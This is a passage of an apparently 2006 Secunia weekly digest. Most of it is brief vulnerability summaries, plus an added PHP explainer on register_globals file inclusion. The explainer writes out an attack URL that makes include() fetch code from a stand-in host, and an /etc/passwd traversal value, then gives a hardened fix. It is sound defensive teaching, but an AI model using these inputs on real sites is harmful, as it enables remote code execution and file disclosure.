[SA20309] qjForum member.asp SQL Injection Vulnerability
[SA20294] NewsCMSLite Admin Logon Bypass Vulnerability
[SA20360] ASPBB "search" Parameter Cross-Site Scripting Vulnerability
[SA20319] Omegasoft Insel "WCE" Parameter Cross-Site Scripting
[SA20342] Jiwa Financials Information Disclosure Vulnerability

UNIX/Linux:
[SA20313] Ubuntu update for nagios
[SA20281] Mandriva update for mpg123
[SA20398] SUSE update for kernel
[SA20374] 4nForum "tid" Parameter SQL Injection Vulnerability
[SA20345] Gentoo update for libtiff
[SA20344] Gentoo update for cherrypy
[SA20339] Mandriva update for dia
[SA20338] Debian update for kernel-source-2.4.17
[SA20326] Debian update for libextractor
[SA20323] Open-Xchange Default Account Password
[SA20314] Ubuntu update for postgresql
[SA20284] Pre News Manager Multiple SQL Injection Vulnerabilities
[SA20381] UnixWare update for MySQL
[SA20283] Debian update for awstats
[SA20396] SUSE update for rug
[SA20389] FreeBSD ypserv Inoperative Access Controls Security Issue
[SA20333] Debian update for mysql-dfsg
[SA20302] OpenOBEX ircp File Overwrite Vulnerability
[SA20390] FreeBSD SMBFS chroot Directory Traversal Vulnerability
[SA20388] SUSE update for vixie-cron
[SA20380] Vixie Cron "do_command.c" setuid Security Issue
[SA20370] Shadow "useradd.c" Insecure Mailbox File Permissions
[SA20368] Debian update for motor
[SA20332] Avaya PDS Software Distributor Privilege Escalation
[SA20329] Motor ktools VGETSTRING Buffer Overflow Vulnerability
[SA20325] AIX lsmcode Unspecified Privilege Escalation Vulnerability
[SA20312] SUSE update for foomatic-filters
[SA20369] xine-lib HTTP Response Heap Corruption Weakness
[SA20330] Debian update for tiff
[SA20315] Debian update for dovecot
[SA20308] Dovecot "LIST" Command Directory Traversal Weakness
[SA20349] Linux Kernel SMP "/proc" Race Condition Denial of Service
[SA20337] PHP "curl_init()" Safe Mode Bypass Weakness

Other:
[SA20378] Secure Elements Class 5 AVR Multiple Vulnerabilities
[SA20343] D-Link Airspot DSA-3100 Gateway "uname" Cross-Site Scripting
[SA20288] Novell Netware abend.log User Credentials Disclosure
[SA20377] Secure Elements Class 5 AVR Message Encryption Security Issue

Cross Platform:
[SA20404] METAjour "system_path" Parameter File Inclusion Vulnerabilities
[SA20399] Ottoman "default_path" File Inclusion Vulnerabilities
[SA20373] phpMyDesktop|arcade Local File Inclusion and Script Insertion
[SA20364] IBM DCE Two Kerberos Vulnerabilities
[SA20358] F at cile Interactive Web Multiple Vulnerabilities
[SA20356] tinyBB SQL Injection and File Inclusion Vulnerabilities
[SA20354] phpBB Activity Mod Plus Module "phpbb_root_path" File Inclusion
[SA20353] UBB.threads Cross-Site Scripting and File Inclusion
[SA20350] phpBB Blend Portal System Module "phpbb_root_path" File Inclusion
[SA20346] Fastpublish CMS "config[fsBase]" File Inclusion Vulnerabilities
[SA20331] Hot Open Tickets "CLASS_PATH" Parameter File Inclusion
[SA20310] Plume CMS "/manager/frontinc/prepend.php" File Inclusion
[SA20301] open-medium.CMS "404.php" File Inclusion Vulnerability
[SA20300] Basic Analysis and Security Engine "BASE_path" File Inclusion
[SA20299] ActionApps "GLOBALS[AA_INC_PATH]" File Inclusion
[SA20298] DoceboLMS "lang" Parameter File Inclusion Vulnerabilities
[SA20292] Back-End CMS "_PSL[classdir]" File Inclusion Vulnerability
[SA20375] pppBLOG "files[0]" Parameter Disclosure of Sensitive Information
[SA20367] WebCalendar "includedir" Parameter Arbitrary Setting File Loading
[SA20366] WikiNi Script Insertion Vulnerabilities
[SA20359] phpBB Nivisec Hacks List Module Local File Inclusion
[SA20352] Eggblog posts.php SQL Injection Vulnerability
[SA20351] aMule Information Disclosure Vulnerability
[SA20316] Geeklog Multiple Vulnerabilities and Weaknesses
[SA20307] Seditio "Referer" HTTP Header Script Insertion Vulnerability
[SA20304] ByteHoard File Copy and Script Insertion Vulnerabilities
[SA20303] MailManager PostgreSQL Encoding-Based SQL Injection
[SA20297] V-webmail "CONFIG[pear_dir]" File Inclusion Vulnerability
[SA20295] Pre Shopping Mall SQL Injection Vulnerabilities
[SA20290] ChatPat Script Insertion and SQL Injection Vulnerabilities
[SA20287] iFdate Cross-Site Scripting and Script Insertion Vulnerabilities
[SA20286] Realty Pro One Cross-Site Scripting and SQL Injection
[SA20363] XiTi Tracking Script "xiti.js" Cross-Site Scripting Vulnerabilities
[SA20341] Open Searchable Image Catalogue SQL Injection Vulnerabilities
[SA20340] DGNews "upprocess.php" File Upload Vulnerability
[SA20336] Photoalbum B&W "index.php" Cross-Site Scripting Vulnerabilities
[SA20334] TikiWiki Multiple Cross-Site Scripting Vulnerabilities
[SA20327] Achievo "atkselector" Parameter SQL Injection Vulnerability
[SA20324] Vacation Rental Script "obj" Parameter Cross-Site Scripting
[SA20322] Pretty Guestbook "pagina" Cross-Site Scripting Vulnerability
[SA20321] Smile Guestbook "pagina" Cross-Site Scripting Vulnerability
[SA20320] Morris Guestbook "pagina" Cross-Site Scripting Vulnerability
[SA20311] php-residence Multiple Script Insertion Vulnerabilities
[SA20306] PHPSimpleChoose Cross-Site Scripting Vulnerability
[SA20305] PHP-AGTC membership system "useremail" Script Insertion
[SA20296] CMS Mundo "searchstring" Cross-Site Scripting Vulnerability
[SA20293] phpESP ADOdb Cross-Site Scripting Vulnerabilities
[SA20291] AZ Photo Album Script Pro Cross-Site Scripting Vulnerability
[SA20289] Elite-Board "search" Parameter Cross-Site Scripting Vulnerability
[SA20285] Assetman Unspecified Script Insertion Vulnerabilities
[SA20282] iFlance Multiple Cross-Site Scripting Vulnerabilities

========================================================================
5) Vulnerabilities Content Listing

Windows:
--

[SA20361] wodSFTP ActiveX Component Arbitrary File Access Vulnerability
Critical: Highly critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information, System access
Released: 2006-05-31

Will Dormann has reported a vulnerability in WeOnlyDo wodSFTP, which can be exploited by malicious people to disclose sensitive information and potentially compromise a user's system.

Full Advisory:
http://secunia.com/advisories/20361/

--

[SA20318] Symantec Client Security / AntiVirus Unspecified Code Execution
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-29

eEye Digital Security has reported a vulnerability in Symantec Client Security and Symantec AntiVirus Corporate Edition, which can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/20318/

--

[SA20407] F-Secure Products Web Console Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-06-01

A vulnerability has been reported in F-Secure Anti-Virus for Microsoft Exchange and F-Secure Internet Gatekeeper, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/20407/

--

[SA20357] Enigma Haber Multiple SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-29

Mustafa Can Bjorn has reported some vulnerabilities in Enigma Haber, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20357/

--

[SA20355] AspSitem SQL Injection and Private Message Disclosure
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data, Exposure of sensitive information
Released: 2006-05-29

Mustafa Can Bjorn has reported two vulnerabilities in AspSitem, which can be exploited by malicious users to disclose sensitive information or malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20355/

--

[SA20348] Nukedit "groupid" Parameter Administrator Register Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2006-05-30

FarhadKey has discovered a vulnerability in Nukedit, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20348/

--

[SA20347] Hitachi HITSENSER3 SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-31

A vulnerability has been reported in Hitachi HITSENSER3, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20347/

--

[SA20335] My Web Server Long URL Denial of Service
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2006-05-29

s3rv3r_hack3r has discovered a vulnerability in My Web Server, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/20335/

--

[SA20317] Mini-NUKE SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-29

Mustafa Can Bjorn has reported some vulnerabilities in Mini-NUKE, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20317/

--

[SA20309] qjForum member.asp SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-29

ajann has reported a vulnerability in qjForum, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20309/

--

[SA20294] NewsCMSLite Admin Logon Bypass Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2006-05-26

FarhadKey has discovered a vulnerability in NewsCMSLite, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20294/

--

[SA20360] ASPBB "search" Parameter Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29

Mustafa Can Bjorn has reported a vulnerability in ASPBB, which can be exploited by malicious people to conduct cross-site scripting attacks.

Full Advisory:
http://secunia.com/advisories/20360/

--

[SA20319] Omegasoft Insel "WCE" Parameter Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-31

MC.Iglo has reported a vulnerability in Omegasoft Insel, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory:
http://secunia.com/advisories/20319/

--

[SA20342] Jiwa Financials Information Disclosure Vulnerability
Critical: Less critical
Where: From local network
Impact: Exposure of sensitive information
Released: 2006-05-30

Robert Passlow has reported a vulnerability in Jiwa Financials, which can be exploited by malicious users to disclose potentially sensitive information.

Full Advisory:
http://secunia.com/advisories/20342/

UNIX/Linux:
--

[SA20313] Ubuntu update for nagios
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2006-05-30

Ubuntu has issued an update for nagios. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20313/

--

[SA20281] Mandriva update for mpg123
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-29

Mandriva has issued an update for mpg123. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/20281/

--

[SA20398] SUSE update for kernel
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Exposure of system information, Exposure of sensitive information, DoS
Released: 2006-06-01

SUSE has issued an update for the kernel. This fixes some vulnerabilities and weaknesses, which can be exploited by malicious, local users to bypass certain security restrictions, gain knowledge of potentially sensitive information and to cause a DoS (Denial of Service), and by malicious people to disclose certain system information, potentially to bypass certain security restrictions and to cause a DoS (Denial of Service).
Full Advisory:
http://secunia.com/advisories/20398/

--

[SA20374] 4nForum "tid" Parameter SQL Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-31

CrAzY CrAcKeR has reported a vulnerability in 4nForum, which can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20374/

--

[SA20345] Gentoo update for libtiff
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-05-31

Gentoo has issued an update for libtiff. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/20345/

--

[SA20344] Gentoo update for cherrypy
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2006-05-31

Gentoo has issued an update for cherrypy. This fixes a vulnerability, which can be exploited by malicious people to disclose potentially sensitive information.

Full Advisory:
http://secunia.com/advisories/20344/

--

[SA20339] Mandriva update for dia
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2006-05-31

Mandriva has issued an update for dia. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a user's system.

Full Advisory:
http://secunia.com/advisories/20339/

--

[SA20338] Debian update for kernel-source-2.4.17
Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access
Released: 2006-05-31

Debian has issued an update for kernel-source-2.4.17.
This fixes some vulnerabilities, which can be exploited by malicious, local users to gain knowledge of sensitive information, cause a DoS (Denial of Service), gain escalated privileges, and by malicious people to cause a DoS, and disclose potentially sensitive information.

Full Advisory:
http://secunia.com/advisories/20338/

--

[SA20326] Debian update for libextractor
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2006-05-29

Debian has issued an update for libextractor. This fixes two vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise an application that uses the library.

Full Advisory:
http://secunia.com/advisories/20326/

--

[SA20323] Open-Xchange Default Account Password
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2006-05-29

Cemil Degirmenci has reported a security issue in Open-Xchange, which potentially can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20323/

--

[SA20314] Ubuntu update for postgresql
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2006-05-30

Ubuntu has issued an update for postgresql. This fixes two vulnerabilities, which potentially can be exploited by malicious people to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/20314/

--

[SA20284] Pre News Manager Multiple SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data
Released: 2006-05-26

luny has reported some vulnerabilities in Pre News Manager, which can be exploited by malicious people to conduct cross-site scripting attacks and SQL injection attacks.
Full Advisory:
http://secunia.com/advisories/20284/

--

[SA20381] UnixWare update for MySQL
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2006-06-01

SCO has issued an update for MySQL. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/20381/

--

[SA20283] Debian update for awstats
Critical: Less critical
Where: From remote
Impact: Security Bypass, System access
Released: 2006-05-26

Debian has issued an update for awstats. This fixes a security issue, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20283/

--

[SA20396] SUSE update for rug
Critical: Less critical
Where: From local network
Impact: Security Bypass, Exposure of sensitive information
Released: 2006-06-01

SUSE has issued an update for rug. This fixes a security issue and a weakness, which can be exploited by malicious, local users to disclose certain sensitive information and potentially by malicious people to bypass security restrictions.

Full Advisory:
http://secunia.com/advisories/20396/

--

[SA20389] FreeBSD ypserv Inoperative Access Controls Security Issue
Critical: Less critical
Where: From local network
Impact: Security Bypass
Released: 2006-06-01

A security issue has been reported in FreeBSD, which can be exploited by malicious people to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20389/

--

[SA20333] Debian update for mysql-dfsg
Critical: Less critical
Where: From local network
Impact: Security Bypass, Exposure of sensitive information, System access
Released: 2006-05-29

Debian has issued an update for mysql-dfsg. This fixes some vulnerabilities, which can be exploited by malicious users to bypass certain security restrictions, disclose potentially sensitive information, and compromise a vulnerable system.
Full Advisory:
http://secunia.com/advisories/20333/

--

[SA20302] OpenOBEX ircp File Overwrite Vulnerability
Critical: Less critical
Where: From local network
Impact: Manipulation of data
Released: 2006-05-26

Jeroen van Wolffelaar has reported a vulnerability in Open OBEX, which can be exploited by malicious people to manipulate certain data on a user's system.

Full Advisory:
http://secunia.com/advisories/20302/

--

[SA20390] FreeBSD SMBFS chroot Directory Traversal Vulnerability
Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2006-06-01

A vulnerability has been reported in FreeBSD, which can be exploited by malicious, local users to bypass certain security restrictions.

Full Advisory:
http://secunia.com/advisories/20390/

--

[SA20388] SUSE update for vixie-cron
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2006-06-01

SUSE has issued an update for vixie-cron. This fixes a security issue, which potentially can be exploited by malicious, local users to perform certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/20388/

--

[SA20380] Vixie Cron "do_command.c" setuid Security Issue
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2006-06-01

Roman Veretelnikov has reported a security issue in Vixie Cron, which potentially can be exploited by malicious, local users to perform certain actions with escalated privileges.

Full Advisory:
http://secunia.com/advisories/20380/

--

[SA20370] Shadow "useradd.c" Insecure Mailbox File Permissions
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2006-05-31

A security issue has been reported in Shadow, which potentially can be exploited by malicious, local users to perform certain actions with escalated privileges.
Full Advisory: http://secunia.com/advisories/20370/ -- [SA20368] Debian update for motor Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2006-05-31 Debian has issued an update for motor. This fixes a vulnerability, which potentially can be exploited by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/20368/ -- [SA20332] Avaya PDS Software Distributor Privilege Escalation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2006-05-29 Avaya has acknowledged a vulnerability in Avaya Predictive Dialing System (PDS), which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/20332/ -- [SA20329] Motor ktools VGETSTRING Buffer Overflow Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2006-05-31 A vulnerability has been reported in Motor, which potentially can be exploited by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/20329/ -- [SA20325] AIX lsmcode Unspecified Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2006-05-29 A vulnerability has been reported in AIX, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/20325/ -- [SA20312] SUSE update for foomatic-filters Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2006-05-30 SUSE has issued an update for foomatic-filters. This fixes a vulnerability, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/20312/ -- [SA20369] xine-lib HTTP Response Heap Corruption Weakness Critical: Not critical Where: From remote Impact: DoS Released: 2006-05-31 Federico L. 
Bossi Bonin has discovered a weakness in xine-lib, which can be exploited by malicious people to crash certain applications on a user's system.
Full Advisory: http://secunia.com/advisories/20369/

--
[SA20330] Debian update for tiff
Critical: Not critical
Where: From remote
Impact: DoS
Released: 2006-05-29
Debian has issued an update for tiff. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/20330/

--
[SA20315] Debian update for dovecot
Critical: Not critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2006-05-29
Debian has issued an update for dovecot. This fixes a weakness, which can be exploited by malicious users to gain knowledge of potentially sensitive information.
Full Advisory: http://secunia.com/advisories/20315/

--
[SA20308] Dovecot "LIST" Command Directory Traversal Weakness
Critical: Not critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2006-05-29
A weakness has been reported in Dovecot, which can be exploited by malicious users to gain knowledge of potentially sensitive information.
Full Advisory: http://secunia.com/advisories/20308/

--
[SA20349] Linux Kernel SMP "/proc" Race Condition Denial of Service
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2006-05-31
Tony Griffiths has reported a vulnerability in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/20349/

--
[SA20337] PHP "curl_init()" Safe Mode Bypass Weakness
Critical: Not critical
Where: Local system
Impact: Security Bypass
Released: 2006-05-30
Maksymilian Arciemowicz has discovered a weakness in PHP, which can be exploited by malicious, local users to bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/20337/

Other:

--
[SA20378] Secure Elements Class 5 AVR Multiple Vulnerabilities
Critical: Moderately critical
Where: From local network
Impact: Security Bypass, Spoofing, Exposure of system information, Exposure of sensitive information, DoS, System access
Released: 2006-05-31
Multiple vulnerabilities and security issues have been reported in Secure Elements Class 5 AVR, which can be exploited by malicious people to disclose potentially sensitive information, bypass certain security restrictions, spoof the contents of messages, cause a DoS (Denial of Service) and potentially to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20378/

--
[SA20343] D-Link Airspot DSA-3100 Gateway "uname" Cross-Site Scripting
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-29
jaime.blasco has reported a vulnerability in D-Link Airspot DSA-3100 Gateway, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/20343/

--
[SA20288] Novell Netware abend.log User Credentials Disclosure
Critical: Less critical
Where: Local system
Impact: Exposure of sensitive information
Released: 2006-05-26
A security issue has been reported in Novell Netware, which can be exploited by malicious, local users to gain knowledge of sensitive information.
Full Advisory: http://secunia.com/advisories/20288/

--
[SA20377] Secure Elements Class 5 AVR Message Encryption Security Issue
Critical: Not critical
Where: From local network
Impact: Exposure of sensitive information
Released: 2006-05-31
A security issue has been reported in Secure Elements Class 5 AVR, which potentially can be exploited by malicious people to disclose certain sensitive information.
Full Advisory: http://secunia.com/advisories/20377/

Cross Platform:

--
[SA20404] METAjour "system_path" Parameter File Inclusion Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-06-01
Kacper has discovered some vulnerabilities in METAjour, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20404/

--
[SA20399] Ottoman "default_path" File Inclusion Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-06-01
Kacper has discovered some vulnerabilities in Ottoman, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20399/

--
[SA20373] phpMyDesktop|arcade Local File Inclusion and Script Insertion
Critical: Highly critical
Where: From remote
Impact: Exposure of sensitive information, System access, Cross Site Scripting
Released: 2006-05-31
darkgod has discovered two vulnerabilities in phpMyDesktop|arcade, which can be exploited by malicious people to conduct script insertion attacks, disclose sensitive information, and compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20373/

--
[SA20364] IBM DCE Two Kerberos Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2006-06-01
IBM has acknowledged two vulnerabilities in IBM DCE, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20364/

--
[SA20358] F@cile Interactive Web Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, System access
Released: 2006-05-29
Mustafa Can Bjorn has reported some vulnerabilities in F@cile Interactive Web, which can be exploited by malicious people to conduct cross-site scripting attacks, disclose sensitive information, and compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20358/

--
[SA20356] tinyBB SQL Injection and File Inclusion Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Manipulation of data, System access
Released: 2006-05-29
Mustafa Can Bjorn has discovered some vulnerabilities in tinyBB, which can be exploited by malicious people to conduct SQL injection attacks and to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20356/

--
[SA20354] phpBB Activity Mod Plus Module "phpbb_root_path" File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-30
Mustafa Can Bjorn has reported a vulnerability in the Activity Mod Plus module for phpBB, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20354/

--
[SA20353] UBB.threads Cross-Site Scripting and File Inclusion
Critical: Highly critical
Where: From remote
Impact: Cross Site Scripting, System access
Released: 2006-05-30
Mustafa Can Bjorn has discovered some vulnerabilities in UBB.threads, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20353/

--
[SA20350] phpBB Blend Portal System Module "phpbb_root_path" File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-30
Mustafa Can Bjorn has reported a vulnerability in the Blend Portal System module for phpBB, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20350/

--
[SA20346] Fastpublish CMS "config[fsBase]" File Inclusion Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-30
Kacper has reported some vulnerabilities in Fastpublish CMS, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20346/

--
[SA20331] Hot Open Tickets "CLASS_PATH" Parameter File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-29
Kacper has discovered a vulnerability in Hot Open Tickets, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20331/

--
[SA20310] Plume CMS "/manager/frontinc/prepend.php" File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-29
beford has discovered a vulnerability in Plume CMS, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20310/

--
[SA20301] open-medium.CMS "404.php" File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-26
Kacper has discovered a vulnerability in the open-medium.CMS, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20301/

--
[SA20300] Basic Analysis and Security Engine "BASE_path" File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-26
str0ke has discovered some vulnerabilities in Basic Analysis and Security Engine, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20300/

--
[SA20299] ActionApps "GLOBALS[AA_INC_PATH]" File Inclusion
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-26
Kacper has discovered some vulnerabilities in ActionApps, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20299/

--
[SA20298] DoceboLMS "lang" Parameter File Inclusion Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-26
beford has discovered some vulnerabilities in DoceboLMS, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20298/

--
[SA20292] Back-End CMS "_PSL[classdir]" File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2006-05-26
Kacper has discovered a vulnerability in Back-End CMS, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/20292/

--
[SA20375] pppBLOG "files[0]" Parameter Disclosure of Sensitive Information
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2006-06-01
rgod has discovered a vulnerability in pppBLOG, which can be exploited by malicious people to disclose sensitive information.
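The "File Inclusion" entries in this batch (METAjour "system_path", Ottoman "default_path", the two phpBB modules with "phpbb_root_path", Fastpublish "config[fsBase]", Hot Open Tickets "CLASS_PATH", BASE "BASE_path", ActionApps "GLOBALS[AA_INC_PATH]", DoceboLMS "lang", Back-End CMS "_PSL[classdir]") are all the same bug class: a script passes a path variable it never initialised to include(), and with register_globals on, a request parameter of the same name supplies it. The following is an added example written for this digest, not code from any of the listed projects or from Secunia; the names app_root_path, IN_APP, APP_ROOT and common.php are hypothetical.

```php
<?php
// Added example; not code from any project named in the advisories
// above. The parameter name app_root_path, the guard constant IN_APP
// and the file name common.php are hypothetical.

// VULNERABLE PATTERN (kept as a comment so it is never executed):
//
//   // modules/example_module.php
//   include($app_root_path . 'common.php');
//
// The module expects its parent script to have set $app_root_path.
// If the module is requested directly and register_globals is on
// (the PHP 4 default), the query string creates the variable:
//   /modules/example_module.php?app_root_path=http://evil.example/x.txt?
// With allow_url_fopen on, include() fetches and executes the remote
// file; with it off, a value like ../../../../etc/passwd still
// discloses local files.

// HARDENED PATTERN
// 1. Modules refuse to run unless an entry script defined a guard.
// 2. The include root is derived from the filesystem, not the request.
// 3. A caller-chosen file name is allow-listed, and the resolved path
//    must sit directly inside the include root.

define('IN_APP', true);                        // set by entry scripts only
define('APP_ROOT', dirname(__FILE__) . '/');   // fixed at install time

function module_guard()
{
    if (!defined('IN_APP')) {
        die('Direct access not permitted');
    }
}

function safe_include($name)
{
    module_guard();
    $allowed = array('common', 'config', 'functions');
    if (!in_array($name, $allowed, true)) {    // strict: no type juggling
        return false;
    }
    $root = realpath(APP_ROOT);
    $path = realpath(APP_ROOT . $name . '.php');
    // realpath() collapses "../" segments and returns false for a
    // missing file, so comparing the resolved directory is reliable.
    if ($root === false || $path === false || dirname($path) !== $root) {
        return false;
    }
    require_once $path;
    return true;
}

// safe_include('common') loads ./common.php when it exists;
// safe_include('http://evil.example/x.txt?') and
// safe_include('../../etc/passwd') return false before any file I/O.
```

The allow-list is the real control; the realpath() comparison is defence in depth for the case where a later edit widens the list. Turning register_globals and allow_url_fopen off in php.ini removes the remote-code variant outright, but the local-file variant survives either setting, so the code fix is still needed.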
Full Advisory: http://secunia.com/advisories/20375/

--
[SA20367] WebCalendar "includedir" Parameter Arbitrary Setting File Loading
Critical: Moderately critical
Where: From remote
Impact: Security Bypass, Exposure of sensitive information
Released: 2006-05-31
socsam has discovered a vulnerability in WebCalendar, which can be exploited by malicious people to bypass certain security restrictions and disclose sensitive information.
Full Advisory: http://secunia.com/advisories/20367/

--
[SA20366] WikiNi Script Insertion Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting
Released: 2006-05-30
Raphael Huck has discovered some vulnerabilities in WikiNi, which can be exploited by malicious people to conduct script insertion attacks.
Full Advisory: http://secunia.com/advisories/20366/

--
[SA20359] phpBB Nivisec Hacks List Module Local File Inclusion
Critical: Moderately critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2006-05-29
Mustafa Can Bjorn has discovered a vulnerability in the Nivisec Hacks List module for phpBB, which can be exploited by malicious people to disclose sensitive information.
Full Advisory: http://secunia.com/advisories/20359/

--
[SA20352] Eggblog posts.php SQL Injection Vulnerability
Critical: Moderately critical
